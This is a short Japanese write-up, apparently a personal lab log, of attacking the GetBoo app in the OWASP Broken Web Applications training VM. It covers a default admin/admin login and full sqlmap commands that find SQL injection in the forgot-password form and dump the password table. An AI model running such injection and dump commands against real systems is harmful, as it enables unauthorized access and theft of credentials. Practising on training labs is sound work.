Hello there, ('ω')ノ
OWASP BWAにあるBetBooをチョイスして。
下記でログインしてみると。
admin/admin
あっさりとログインできたのでなかったことにして。
ログアウトして、適当にログインして。
abc/abc
リクエストを確認すると、下記のパラメータが確認できて。
token=0e40b415ec81f9613974bb1bdac4a67b&name=abc&pass=abc&submitted=Log+In
sqlmapで、脆弱性を確認することに。
sqlmap -u "http://192.168.0.14/getboo/login.php" --data "token=0e40b415ec81f9613974bb1bdac4a67b&name=abc&pass=abc&submitted=Log+In"
途中、基本的には大文字のデフォルトを選択して。
POSTパラメータ「token」はアンチCSRFトークンを保持しているようです
sqlmapがそれ以降のリクエストで自動的に更新するようにしますか? [y / N] N
ターゲットURLへの接続をテストしています
サーバが独自のCookieを設定しようとしているときにCookieを宣言していません
( 'PHPSESSID = 9cvhjcq2s6q ... 6f29fpdsh2')
それらを使いますか[Y / n] Y
他の(潜在的な)手法が少なくとも1つ見つからない場合は、
基本的なUNIONテストのみを実行することをお勧めします
リクエストの数を減らしたいですか? [Y / n] Y
結果より、どうやらインジェクションできそうもないようで。
確認のため、ダンプしてみても脆弱性がないので同じ結果で。
sqlmap -u "http://192.168.0.14/getboo/login.php" --data "token=0e40b415ec81f9613974bb1bdac4a67b&name=abc&pass=abc&submitted=Log+In" --dump-all
次にパスワードを忘れたページに移って。
同じようにパラメータを確認して。
aname=abc&email=abc%40mail.com&submitted=Hint+question
sqlmapでいきなりダンプしてみることに。
sqlmap -u "http://192.168.0.14/getboo/forgotpass.php" --data "aname=abc&email=abc%40mail.com&submitted=Hint+question" --dump-all
OWASP BWA全体のデータベースのダンプをし始めたので一旦、終了して。
まずは、データベースの探索から。
sqlmap -u "http://192.168.0.14/getboo/forgotpass.php" --data "aname=abc&email=abc%40mail.com&submitted=Hint+question" --dbs
getbooというデータベースがみつかったので。
データベースを指定して、再度ダンプすることに。
sqlmap -u "http://192.168.0.14/getboo/forgotpass.php" --data "aname=abc&email=abc%40mail.com&submitted=Hint+question" -D getboo --dump-all
パスワードを保存しているテーブルをダンプできたので。
下記でログインしてみると。
demo/demo
ログインできて。
Best regards, (^^ゞ